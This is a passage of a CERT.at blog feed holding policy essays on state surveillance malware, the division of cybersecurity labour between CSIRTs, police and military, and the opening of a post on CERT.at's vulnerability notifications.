&lt;li class=&quot;block&quot;&gt;The state wants IT systems to be secure so that citizens, organizations, companies and authorities can communicate through them confidentially and exchange data securely. This requires, among other things, that the systems are protected according to the best available standards and technology. If there are vulnerabilities, these must be patched as quickly as possible or reported to the manufacturer so that they can provide patches.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The state wants to gain insight into the communications and data of suspects in order to prevent and / or solve crimes, terrorism or espionage. This presupposes, among other things, that the systems used by the suspects have vulnerabilities that can be exploited to place software on the suspects' devices to enable the insights.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It will not be possible to completely fulfill both requirements. My colleague Otmar Lendl already pointed this out seven years ago in an &lt;a href=&quot;https://www.cert.at/de/blog/2017/8/blog-20170731130131-2076&quot; target=&quot;_blank&quot;&gt;article on a very similar topic&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In principle, I understand the authorities' desire to gain insight into the communications of suspects (the FBI even felt this desire so strongly that they simply made &lt;a href=&quot;https://en.wikipedia.org/wiki/Operation_Trojan_Shield&quot; target=&quot;_blank&quot;&gt;their own messenger&lt;/a&gt; available to the criminals). But the way politicians envision it - clean, clearly defined, secure, safeguarding fundamental rights - is simply not possible. No matter how often they wish it were.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Even if I am not a criminalist, investigator or expert on terrorism, I can think of measures off the top of my head that are very likely to be more promising and are also much easier to reconcile with constitutional law.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I know of colleagues in federal employment who had to wait several months to get the peripherals they needed for their work computers due to outdated processes and the miserably slow grindings of bureaucracy. Or cases in which one department is almost drowning in the amount of work to be done while another team with the same technical expertise is bored into &quot;boreout&quot;, but for whatever reason is not allowed to provide support.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In contact with CSIRTs and law enforcement agencies from other countries, we hear time and again that cooperation with institutions from Austria works well - when it does come about, because motivated people throw in the towel in frustration with alarming regularity.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;When I talk to people I know who work in social and probation services, the massive lack of resources is a regular topic. I'm going to go out on a limb and say that with all the resources, time and energy (and probably a certain amount of budget) that has gone into the issue of messenger surveillance and state malware, many other things could have been improved that would have had a more lasting positive effect on our security.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;To conclude with a very personal example: although temporal correlation naturally does not imply a causal link, I cannot help suspecting that the topic is being brought to the boil in connection with the foiled attack attempts surrounding the Taylor Swift concerts in Vienna.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In my (still) younger years, I worked for some time as a security guard for major events. And even back then, the only requirement for employment was a willingness to work nights in the pouring rain for &amp;euro;6.50 an hour. As a result, I guarded the back entrance of a well-known cultural institution with two colleagues, one of whom trained team kickboxing on dirt tracks in his spare time in the context of a Viennese soccer club, while my second colleague had to cover up some of his tattoos to avoid coming into conflict with various sections of the VbtG. That seemed strange to me at the time.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;My eyes widened even more a few years ago when it became known that during the committee of inquiry into the BVT affair, a security employee with close links to a right-wing extremist who had been known to the authorities for decades was working in parliament. Apparently, in this case too, no real checks were carried out on who was employed for &amp;euro;6.50 per hour (hopefully adjusted for inflation).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;After all, this led to the creation of &quot;clear and binding security standards&quot; for security companies in the Turquoise-Green government program from 2020. As part of the investigations following the cancellation of Taylor Swift's concerts in Vienna a few weeks ago, it emerged that eight of the security staff employed at the concerts had already been found guilty of jihadism. It seems that the security standards haven't quite worked out so far.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The point I want to make is that government malware is not the solution. It is not even one of several possible solutions, like the examples I mentioned in the previous paragraphs. The &quot;Bundestrojaner&quot; is a problem.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The targeted monitoring of individual conversations or just certain chat applications while at the same time avoiding excessive invasion of privacy and ensuring the technical security of monitored devices is not possible in the way the decision-makers imagine. I wish this didn't have to be explained anew every few years.&lt;/p&gt;</description><pubDate>Tue, 20 Aug 2024 11:57:08 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2024/8/another-round-government-malware-digital-surveillance</guid><dc:creator>CERT.at</dc:creator><dc:date>2024-08-20T11:57:08Z</dc:date></item><item><title>Roles in Cybersecurity: CSIRTs / LE / others</title><link>https://www.cert.at/en/blog/2024/7/csirt-le-military</link><description>&lt;p&gt;Back in January 2024, I was asked by the Belgian EU Presidency to moderate a panel during their high-level conference on cyber security in Brussels. The topic was the relationship between cyber security and law enforcement: how do CSIRTs and the police / public prosecutors cooperate, what works here and where are the fault lines in this collaboration. As the moderator, I wasn&amp;rsquo;t in the position to really present my own view on some of the issues, so I&amp;rsquo;m using this blogpost to document my thinking regarding the CSIRT/LE division of labour. From that starting point, this text kind of turned into a rant on what&amp;rsquo;s wrong with IT Security.&lt;/p&gt;&#13;
&lt;p&gt;When I got the assignment, I recalled a report I had read years ago: &quot;Measuring the Cost of Cybercrime&quot; by Ross Anderson et al from 2012. In it, the authors try to estimate the effects of criminal actors on the whole economy: what are the direct losses and what are costs of the defensive measures put in place to defend against the threat. The numbers were huge back then, and as various speakers during the conference mentioned: the numbers have kept rising and rising and the figures for 2024 have reached obscene levels. Anderson et al write in their conclusions: &quot;The straightforward conclusion to draw on the basis of the comparative figures collected in this study is that we should perhaps spend less in anticipation of computer crime (on antivirus, firewalls etc.) but we should certainly spend an awful lot more on catching and punishing the perpetrators.&quot;&lt;/p&gt;&#13;
&lt;p&gt;Over the last years, the EU has proposed and enacted a number of legal acts that focus on the prevention, detection, and response to cybersecurity threats. Following the original NIS directive from 2016, we are now in the process of transposing and thus implementing the NIS 2 directive with its expanded scope and security requirements. This imposes a significant burden on huge numbers of &quot;essential&quot; and &quot;important entities&quot; which have to heavily invest in their cybersecurity defences. I failed to find a figure in Euros for this, only the &lt;a href=&quot;https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:52020SC0345&quot;&gt;estimate of the EU Commission&lt;/a&gt; that entities new to the NIS game will have to increase their IT security budget by 22 percent, whereas the NIS1 &quot;operators of essential services&quot; will have to add 12 percent on their current spending levels. And this isn&amp;rsquo;t simply CAPEX, there is a huge impact on the operational expenses, including manpower and effects on the flexibility of the entity.&lt;/p&gt;&#13;
&lt;p&gt;This all adds up to a huge cost for companies and other organisations.&lt;/p&gt;&#13;
&lt;p&gt;What is happening here? &lt;strong&gt;We would never ever tolerate that kind of security environment in the physical world, so why do we allow it to happen online?&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;h1&gt;The physical world&lt;/h1&gt;&#13;
&lt;p&gt;So, let&amp;rsquo;s look at playing field in the physical environment and see how the security responsibilities are distributed there:&lt;/p&gt;&#13;
&lt;p&gt;Defending against low-level crime is the responsibility of every citizen and organisation: you are supposed to lock your doors, you need to screen the people you&amp;rsquo;re allowing to enter and the physical defences need to sensible: Your office doesn&amp;rsquo;t need to be a second Fort Knox, but your fences / doors / gates / security personnel need to be adequate to your risk profile. They should be good enough to either completely thwart normal burglars or at least impose such a high risk to them (e.g., required noise and time for a break-in) that most of them are deterred from even trying.&lt;/p&gt;&#13;
&lt;p&gt;One of the jobs of the police is to keep low-level crime from spiralling out of control. They are the backup that is called by entities noticing a crime happening. They respond to alerts raised by entities themselves, their burglar alarms and often their neighbours.&lt;/p&gt;&#13;
&lt;p&gt;Controlling serious, especially organized crime is clearly the responsibility of law enforcement. No normal entity is supposed to be able to defend itself against Al Capone style gangs armed with submachine guns. This is where even your friendly neighbourhood cop is out of his league and the specialists from the relevant branches of the security forces need to be called in. That doesn&amp;rsquo;t mean that these things never happen at all: there is organized crime in the EU, and it might take a few years before any given gang is brought under control.&lt;/p&gt;&#13;
&lt;p&gt;Defending against physical incursions by another country is the job of the military. They have the big guns; they have the training and thus means to defend the country from outside threats. Hopefully, they provide enough deterrence that they are not needed. Additionally, your diplomats and politicians have worked to create an international environment in which no other nation even contemplates invading your country.&lt;/p&gt;&#13;
&lt;p&gt;We can see here a clear escalation path of physical threats and how the responsibility to deal with them shifts accordingly.&lt;/p&gt;&#13;
&lt;h1&gt;The online world&lt;/h1&gt;&#13;
&lt;p&gt;Does the same apply to cyber threats? And if not, why?&lt;/p&gt;&#13;
&lt;h2&gt;The basics&lt;/h2&gt;&#13;
&lt;p&gt;The equivalent of putting a simple lock on your door is basic cyber hygiene: Firewalls, VPNs, shielding management interfaces, spam and malspam filters, a decent patch management, as well as basic security awareness training. Hopefully, this is enough to stop being a target of opportunity, where script kiddies or mass exploitation campaigns can just waltz into your network. But there is a difference: the risk of getting caught simply for trying to hack into a network is very low. Thus, these actors can just keep on trying over and over again. Additionally, this can be automated and run on a global scale.&lt;br /&gt; In the real word, intrusion attempts do not scale at all. Every single case needs a criminal on site and that limits the number of tries per night and incurs a risk of being caught at each and every one of these. The result is that physical break-in attempts are &lt;strong&gt;rare&lt;/strong&gt;, whereas cyber break-in attempts are so frequent that the industry has decided that &quot;successful blocks on FW or mail-relay level per day&quot; are no longer sensible metrics for a security solution.&lt;br /&gt; &lt;br /&gt; And just forget about reporting these to the police. Not all intrusion attempts are actually malicious (a good part of CERT.at&amp;rsquo;s data-feeds on vulnerabilities is based on such scans), the legal treatment of such acts are unclear (especially on an international level), and the sheer mass of it overwhelms all law enforcement capabilities. Additionally, these intrusion attempts usually are cross-border, necessitating an international police collaboration. The penalties for such activities (malicious scans, sending malspam, etc.) are also often too low to qualify for international efforts.&lt;br /&gt; &lt;br /&gt; In the physical world, the perpetrators must be present at the site of their victims. We&amp;rsquo;re not yet at the stage where thieves and burglars send remote controlled drones to break into houses and steal valuables there &amp;ndash; unless you count the use of hired and expendable low-level criminals as such. There is thus no question about jurisdiction and the possibility of the local police to actually enforce the law. Collecting clues and evidence might not always be easy, and criminals fleeing the country before being caught is a common trope in crime literature, nevertheless there is the real possibility that the police can successfully track and then arrest the criminals.&lt;br /&gt; &lt;br /&gt; The global nature of the Internet changes all this. As the saying goes: there is no geography on the Internet, everyone is a direct neighbour to everybody else. Just as any simple website is open to visitors from all over the world, it can be targeted by criminals from all over the globe. There is no need for the evil hackers to be on the same continent as their targets, let alone in the same jurisdiction. Thus, even if the police can collect all the necessary evidence to identify the perpetrators, it cannot just grab them off the street &amp;ndash; they might be far out of reach of the local law enforcement.&lt;br /&gt; &lt;br /&gt; And another point is different: usually, physical security measures are quite static. There is no monthly patch-day for your doors. I can&amp;rsquo;t recall any situation where a vendor of safes or locks had to issue an alert to all customers that they have to upgrade to new cylinders because a critical vulnerability was found in the current version (although watching &lt;a href=&quot;https://www.youtube.com/@lockpickinglawyer&quot;&gt;LPL videos&lt;/a&gt; are a good argument that they should start doing that). &lt;a href=&quot;https://www.theguardian.com/money/2024/feb/24/smart-keys-car-crime-thieves-hi-tech-arms-race&quot;&gt;Recent reports on vulnerabilities of keyless fobs&lt;/a&gt; for unlocking of cars show that the lines are starting to blur between these worlds.&lt;/p&gt;&#13;
&lt;h2&gt;Organized crime&lt;/h2&gt;&#13;
&lt;p&gt;What about serious, organized crime? The online equivalent to a mob boss is a &quot;Ransomware as a Service (RaaS)&quot; group: they provide the firepower, they create an efficient ecosystem of crime and they make it easier for low-level miscreants to start their criminal careers. Examples are Locky, REvil, DarkSide, LockBit, Cerber, etc. Yes, sometimes law-enforcement, through long-running, and international collaborations between law-enforcement agencies, is able to crack down on larger crime syndicates. Those take-downs vary in their effectiveness. In some cases, the police manages to get hold of the masterminds, but often enough they just get lower or mid-level people and some of the technical infrastructure, leading just to a temporary reprieve for the victims of the RaaS shop.&lt;br /&gt; &lt;br /&gt; Two major impediments to the effectiveness of these investigations are the global nature of such gangs and thus the need for truly global LE collaboration and the ready availability of compromised systems to abuse and malicious ISPs who don&amp;rsquo;t police their own customers. Any country whose police force is not cooperating effectively creates a safe refuge for the criminals. The current geo-political climate is not helpful at all. Right now, there simply is no incentive for the Russian law enforcement to help their western colleagues by arresting Russian gangs targeting EU or US entities. Bullet-proof hosters are similar, they rent the infrastructure to criminals from which to launch attacks from. And often enough the perpetrators simply use the infrastructure of one of their victims to attack the next.&lt;/p&gt;&#13;
&lt;p&gt;The end result is that serious cybercrime is rampant. Companies and other organisations must defend themselves against well-financed, experienced, and capable threat-actors. As it is, law enforcement is not capable to lower the threat level low enough to take that responsibility away from the operators.&lt;/p&gt;&#13;
&lt;h2&gt;Nation states&lt;/h2&gt;&#13;
&lt;p&gt;The next escalation step are the nation state attackers. They come in (at least) two types: Espionage and Disruption.&lt;br /&gt; &lt;br /&gt; Espionage is nothing new; the employment of spies traces back to antique world. But just as with cybercrime, in the new online world it is no longer necessary to send agents on dangerous missions into foreign countries. No, a modern spy has a 9 to 5 desk job in drab office building where the highest risk to his personal safety is a herniated vertebral disc caused by unergonomic desks and chairs.&lt;/p&gt;&#13;
&lt;p&gt;It&amp;rsquo;s been rare, but cyber-attacks with the aim of causing real world disruptions have appeared over the last ten years, especially in the Russia/Ukraine context. The impact can be similar to Ransomware: the IT systems are disabled and all the processes supported by those system will fail. The main difference is that you can&amp;rsquo;t simply buy your way out of a state-sponsored disruptive attack. There have been cases where the attackers try to inflict physical damage to either the IT systems (&lt;a href=&quot;https://www.reuters.com/article/us-saudi-cyber-idUSKBN1571ZR/&quot;&gt;bricking of pcs in the Aramco attack&lt;/a&gt;) or machinery controlled by industrial control systems.&lt;/p&gt;&#13;
&lt;p&gt;This is a frustrating situation. We&amp;rsquo;re in a defensive mode, trying to block and thwart attack after attack from well resourced adversaries. As the recent history shows, we are not winning this fight &amp;ndash; cybercrime is rampant and state-sponsored APTs are running amok. Even if one organisation manages to secure its own network, the tight interconnectedness with and dependency of others will leave it exposed to supply chain risks.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;What can we do about this?&lt;/h1&gt;&#13;
&lt;p&gt;Such a situation reminds me of the old proverb: &quot;if you can&amp;rsquo;t win the game, change the rules&quot;. I simply do not see a simple technical solution to the IT security challenge. We&amp;rsquo;ve been sold these often enough under various names (firewalls, NGFW, SIEMs, AV, EDR, SOAR, cloud-based detection, sandboxes to detected malicious e-mail, &amp;hellip;) and while all these approaches have some value, they are fighting the symptoms, but not the cause of the problem.&lt;/p&gt;&#13;
&lt;p&gt;There certainly are no simple solutions, and certainly none without significant downsides. &lt;strong&gt;I&amp;rsquo;m thus not proposing that the following ideas need to be implemented tomorrow.&lt;/strong&gt; This article is just supposed to move the &lt;a href=&quot;https://en.wikipedia.org/wiki/Overton_window&quot;&gt;Overton Window&lt;/a&gt; and start a discussion outside the usual constraints.&lt;/p&gt;&#13;
&lt;p&gt;So, what ideas can I come up with?&lt;/p&gt;&#13;
&lt;h2&gt;Really invest in Law Enforcement&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The statistics show every year that cyber-crime is rising. This is followed by a ritual proclamation of the minister in charge that we will strengthen the police force tasked with prosecuting cyber-crime. The follow-through just isn't there. Neither the police, nor the judiciary is in any way staffed to really make a dent in cybercrime as a whole.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;They are fighting a defensive war, happy with every small victory they can get, but overall they are simply not staffed at a level where they really could make a difference.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Denial of safe havens&lt;/h2&gt;&#13;
&lt;p&gt;Criminals or other attackers need some infrastructure where they stage their attacks from. Why do we tolerate this? Possible avenues for a change are:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Revisit the laws that shield ISPs from liabilities regarding misbehaving customers. This does not need to be a complete reversal, but there need to be clear and strong incentives not to allow customers to stage attacks from an ISP&amp;rsquo;s network. See below for more details.&lt;/li&gt;&#13;
&lt;li&gt;And on the other side, refuse to route the network blocks from ISPs who are known to tolerate criminals on their network. Back on Usenet, this was called the &quot;UDP &amp;ndash; Usenet Death Penalty&quot;: when you don&amp;rsquo;t police your own users&amp;rsquo; misbehaviour on this global discussion forum, then other sites will decide not to accept any articles from your cesspool any more.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;The aim must be the end of &quot;bulletproof&quot; hosters. There have been &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/bulletproof-hosting-founder-imprisoned-for-helping-cybercrime-gangs/&quot;&gt;prior successes&lt;/a&gt; in this area, but we can certainly do better on a global scale.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Don&amp;rsquo;t spare abused systems&lt;/h2&gt;&#13;
&lt;p&gt;Instead of renting infrastructure from bulletproof hosting outfits, the criminals often hack into an unrelated organisation and then abuse its systems to stage attacks from. Abused systems range from simple C2 proxies on compromised websites, DDoS-amplification, accounts for sending spam-mails to &lt;a href=&quot;https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html&quot;&gt;elaborate networks of proxies on compromised CPEs&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p&gt;These days, we politely warn the owners of the abused devices and ask them nicely to clean up their infrastructure.&lt;/p&gt;&#13;
&lt;p&gt;We treat them as victims, and not as accomplices.&lt;/p&gt;&#13;
&lt;p&gt;Maybe we need to adjust that approach.&lt;/p&gt;&#13;
&lt;h2&gt;Mutual assured cyber destruction&lt;/h2&gt;&#13;
&lt;p&gt;As bad as the cold war was, the concept of mutual assured destruction managed to deter the use of nuclear weapons for over 70 years. Right now, there is no functioning deterrence on the Internet.&lt;/p&gt;&#13;
&lt;p&gt;I can&amp;rsquo;t say what we need to do here, but we must create a significant barrier to the employment of cyberattacks. Right now, most offensive cyber activities are considered &quot;trivial offences&quot;, maybe worth a few sternly worded statements, but nothing more. The &lt;a href=&quot;https://ccdcoe.org/library/publications/si-vis-cyber-pacem-para-sanctiones-the-eu-cyber-diplomacy-toolbox-in-action/&quot;&gt;EU Cyber Diplomacy Toolbox&lt;/a&gt; is a step in that direction, but is still rather harmless in its impact.&lt;/p&gt;&#13;
&lt;p&gt;We can and should do more.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Broken Window Theory&lt;/h2&gt;&#13;
&lt;p&gt;From &lt;a href=&quot;https://en.wikipedia.org/wiki/Broken_windows_theory&quot;&gt;Wikipedia&lt;/a&gt;: &quot;In criminology, the broken windows theory states that visible signs of crime, antisocial behavior, and civil disorder create an urban environment that encourages further crime and disorder, including serious crimes.&quot;&lt;/p&gt;&#13;
&lt;p&gt;To put this bluntly: As we haven&amp;rsquo;t managed to solve the Spam E-mail problem, why do we think we can tackle the really serious crimes?&lt;/p&gt;&#13;
&lt;p&gt;Thus, one possible approach is to set aside some investigative resources in the law enforcement community to go after the low-level, but very visible criminals. Take for example the long running spam waves promoting ED pills. Tracking the spam source might be hard, but there is a clear money trail on the payment side. This should be an eminently solvable problem. Track those gangs down, make an example out of them and let every other criminal guess where the big LE guns will be pointing at next.&lt;/p&gt;&#13;
&lt;p&gt;As a side effect, the criminal infrastructure providers who support both the low level and the more serious cybercrime might also feel the heat.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Offer substantial bounties&lt;/h2&gt;&#13;
&lt;p&gt;We always say that ransomware payments are fuelling the scourge. They provide RaaS gangs with fresh capital to expand their operations and it is a great incentive for further activities in that direction.&lt;/p&gt;&#13;
&lt;p&gt;So, what about the following: decree by law that if you&amp;rsquo;re paying a ransom, then you have to pay 10% of the ransom into a bounty fund that incites operators in the ransomware gangs to turn in their accomplices.&lt;/p&gt;&#13;
&lt;p&gt;Placing &lt;a href=&quot;https://en.wikipedia.org/wiki/Bounty_(reward)&quot;&gt;bounties&lt;/a&gt; on the head of criminals is a very old idea and has proven to be effective to create distrust and betrayal in criminal organisations.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Liability of Service Providers&lt;/h2&gt;&#13;
&lt;p&gt;Criminals are routinely abusing the services offered by legitimate companies to further their misdeeds. Right now, the legal environment is shielding the companies whose services are abuse, from direct liability regarding the action of their customers.&lt;/p&gt;&#13;
&lt;p&gt;Yes, this liability is usually not absolute, often there is a &quot;knowingly&quot; or &quot;repeatedly&quot; or &quot;right to respond to allegations&quot; in the law that absolve the service providers to proactively search for or quickly react to reports of illegal activities originating from their customers.&lt;/p&gt;&#13;
&lt;p&gt;We certainly can have a second look at these provisions.&lt;/p&gt;&#13;
&lt;p&gt;Not all service providers should be treated the same way, a small ISP offering to host websites has vastly smaller resources to deal with abuse that the hyper-scalers with billions of Euros stock market valuations. The impact of abuse scales about the same way: a systematic problem at Google is much more relevant than anything a small regional ISP can cause.&lt;/p&gt;&#13;
&lt;p&gt;Spending the same few percentage points of their respective revenue on countering abuse can give the abuse handling teams of big operators the necessary punch to really be on top of abuse at their platform and do it 24x7 in real-time.&lt;/p&gt;&#13;
&lt;p&gt;We need to incentivise all actors to take care of the issue.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Search Engine Liability&lt;/h3&gt;&#13;
&lt;p&gt;By using SEO techniques or via simply buying relevant advertisement slots, criminals sometimes manage to lure people looking for legitimate free downloads to fake download sites that offer backdoored versions of the programs that the user is looking for.&lt;/p&gt;&#13;
&lt;p&gt;Given the fact that this is a very lucrative market for search engine operators, there should be no shortage on resources to deal with this abuse either proactively or in near real time when they are reported.&lt;/p&gt;&#13;
&lt;p&gt;And I really mean near real-time. Given e.g., Google&amp;rsquo;s search engine revenue, it is certainly possible to resolve routine complaints within 30 minutes, on a 24x7 coverage. If they are not able to do it, make them both liable for damages caused by their inaction and impose regulatory fines on them.&lt;/p&gt;&#13;
&lt;p&gt;For smaller companies, the response time requirements can be scaled down to levels that even a mom &amp;amp; pop ISP can handle.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Content Delivery Network liability&lt;/h3&gt;&#13;
&lt;p&gt;The same applies to content delivery networks: such CDNs are often abused to shield criminal activities. By hiding behind a CDN, it becomes harder to take down the content at the source, it becomes tricky to just firewall off the sewers of the Internet and even simple defensive measures like blocking JavaScript execution by domain are disrupted if the CDN serves scripts from their domains.&lt;/p&gt;&#13;
&lt;p&gt;Cloudflare boasts that a significant share of all websites is now served using their infrastructure. Still, they only commit to a 24h reaction time on abuse complaints for things like investment fraud.&lt;/p&gt;&#13;
&lt;p&gt;With great market-share comes great responsibility.&lt;/p&gt;&#13;
&lt;p&gt;We really need to forcibly re-adjust their priorities. It might be a feel-good move for libertarians to enable free speech, and sometimes controversial content really needs protection. But Cloudflare is acting like a polluter who doesn&amp;rsquo;t really care what damage their actions cause on others.&lt;/p&gt;&#13;
&lt;p&gt;Even in the libertarian heaven, good behaviour is triggered by internalizing costs by making liabilities explicit.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Webhoster liability&lt;/h3&gt;&#13;
&lt;p&gt;The same applies to the actual hosters of malicious content. In the western world, we need to give webhosters a size-dependent deadline for reacting to abuse-reports. For the countries who do not manage to create and enforce similar laws, the rest of the world need to react by limiting the reachability of non-conforming hosters.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Keeping the IT market healthy&lt;/h2&gt;&#13;
&lt;p&gt;Market monopolies are bad for security. They create a uniform global attack surface and distort the security incentives. This applies both to the software, the hardware/firmware side, the cloud as well as to the ISP ecosystem.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;What can the military do?&lt;/h2&gt;&#13;
&lt;p&gt;In the physical word, the military is the ultimate deterrence against nation state transgressions. This is really hard to translate to cyber-security. I mentioned MAD above. This is really tricky: what is the proper way of retaliation? How do we avoid a dangerous escalation of hack, hack-back and hack-back-back?&lt;/p&gt;&#13;
&lt;p&gt;Or should we relish in the escalation? A colleague recently mentioned that some ransomware gang claimed to have hacked the US Federal Reserve and is threatening to publish terabytes of stolen data. I half joked by replying with &quot;If I were them, I'd start to worry about a kinetic response by the US.&quot;&lt;/p&gt;&#13;
&lt;p&gt;There are precedents. Some countries are well known to react violently if someone decides to take one of their citizens as hostage. No negotiations. Only retribution with whatever painful means are available.&lt;/p&gt;&#13;
&lt;p&gt;Some cyber-attacks have a similar impact as violent terrorist attacks, just look at the ripple on effect on hospitals in London following the attack on Synnovis. So why should our response portfolio against ransomware actors rule out some the options we keep open for terrorists?&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Free and open vs. closed and secure&lt;/h2&gt;&#13;
&lt;p&gt;Overall, there seem to be two major design decisions that have a major cyber security impact.&lt;/p&gt;&#13;
&lt;p&gt;First, the Internet is a content-neutral, global packet-switched network, for which there is only a very limited consensus regarding the rules that its operators and users should adhere to. And there are even fewer global enforcement possibilities for the little rules that we can agree on.&lt;/p&gt;&#13;
&lt;p&gt;On one hand, this is good. We do not want to live in a world where the standards for the Internet are set and enforced by oppressive regimes. The global reach of the Internet is also a net positive: it is good that there is a global communication network that interconnects all humans. Just as the phone network connects all countries, the global reach of the Internet has the potential to foster communication across borders and can bring humanity together. We want dissidents in Russia and China to be able to communicate with the outside world.&lt;/p&gt;&#13;
&lt;p&gt;On the other hand, this leads to the effects described in the first section: geography has no meaning on the Internet; thus, we&amp;rsquo;re importing the shadiest locations of the Internet right into our living rooms.&lt;/p&gt;&#13;
&lt;p&gt;We simply can&amp;rsquo;t have both: a global, content agnostic network that reaches everybody on the planet, and a global network where the behaviour that we find objectionable is consistently policed.&lt;/p&gt;&#13;
&lt;p&gt;The real decision is thus where to compromise: On &quot;global&quot;, by e.g. declining to be reachable from the swamps of the Internet, or on &quot;security&quot;: live with the dangers that arise from this global connectivity.&lt;/p&gt;&#13;
&lt;p&gt;The important part here is: this is a decision we need to take. Individually, as organisation and, perhaps, as a country.&lt;/p&gt;&#13;
&lt;p&gt;We face a similar dilemma with our computing infrastructure: The concept of the generic computer, the open operating systems, the freedom to install third-party programs and the availability of accessible programming frameworks plus a wealth of scripting languages are essential for the speed of innovation. A closed computing environment can never be as vibrant and successful.&lt;/p&gt;&#13;
&lt;p&gt;The ability to run arbitrary new code is both a boon for innovation, but also creates the danger of malicious code being injected into our system. Retrofitting more control here (application allowlisting, signed applications, strong application isolation, walled garden app-stores, &amp;hellip;) can mitigate some of the issues, but will never reach the security properties of system that was designed to run exactly one application and doesn&amp;rsquo;t even contain the foundations for running additional code.&lt;/p&gt;&#13;
&lt;p&gt;Again, there is a choice we need to make: do we prefer open systems with all their dangers, or do we try to nail things down to lower the risks? This does not need to be a global choice: we should probably choose the proper flexibility vs. security setting depending on intended use of an IT system. A developer&amp;rsquo;s box needs not have the same setting as a tablet for a nursing home resident.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Technical solutions &amp;ndash; just don&amp;rsquo;t be easily hackable?&lt;/h2&gt;&#13;
&lt;p&gt;In an ideal world, our IT systems would be perfectly secure and would not be easy pray for cyber-criminals and nation state actors. Yes, any progress in securing our infrastructure is welcome, but we cannot simply rely on this path. Nevertheless, there are a few low hanging fruits we need to take:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Default configurations: Networked devices need to come with defaults that are reasonably secure. Don&amp;rsquo;t expect users to go through all configuration settings to secure a product that they bought. This can be handled via regulation.&lt;/li&gt;&#13;
&lt;li&gt;Product liability is also an interesting approach. This is not trivial to get right, but certain classes of security issues are so basic that failing to protect against them amounts to gross negligence in 2024. For example, we recently saw several path traversal vulnerabilities in edge-devices sold in 2024 by security companies with more than a billion-dollar market cap. Sorry, such bugs should not happen in this league.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;The Cyber Resilience Act is an attempt to address these issues. I have no clue whether it will actually work out well.&lt;/p&gt;&#13;
&lt;p&gt;While I hope that we will manage to better design and operate our critical IT infrastructure in the future, this is not the part where I&amp;rsquo;d put my money on. We&amp;rsquo;ve been chasing that goal for the last 25 years and it hasn&amp;rsquo;t been working out so great.&lt;/p&gt;&#13;
&lt;p&gt;We really need to start thinking outside the box.&lt;/p&gt;</description><pubDate>Mon, 01 Jul 2024 16:06:58 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2024/7/csirt-le-military</guid><dc:creator>CERT.at</dc:creator><dc:date>2024-07-01T16:06:58Z</dc:date></item><item><title>How We Cover Your Back</title><link>https://www.cert.at/en/blog/2024/6/how-we-cover-your-back</link><description>&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;As a national CERT, one of our extremely important tasks is to proactively inform network operators about potential or confirmed security issues that could affect Austrian companies. Initially, I intended to discuss the technical changes in our systems, but I believe it's better to start by explaining what we actually do and how we help you sleep well at night &amp;mdash; though you should never rely solely on us!&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Understanding the Security Landscape&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Consider the vastness of the Internet: millions of connected devices, millions of different configurations, and thousands of solutions. In Austria alone, shodan.io reports approximately 1.7 million devices accessible online &lt;a href=&quot;#references&quot;&gt;[1]&lt;/a&gt;. These include web and mail servers, VPN endpoints, databases, and virtually anything else you can imagine connected to the Internet. Such devices can be misconfigured, exposed by mistake, or have critical vulnerabilities. While the owners are primarily responsible for their services, we enhance the security of Austrians by notifying network operators of significant issues.&lt;/p&gt;&#13;
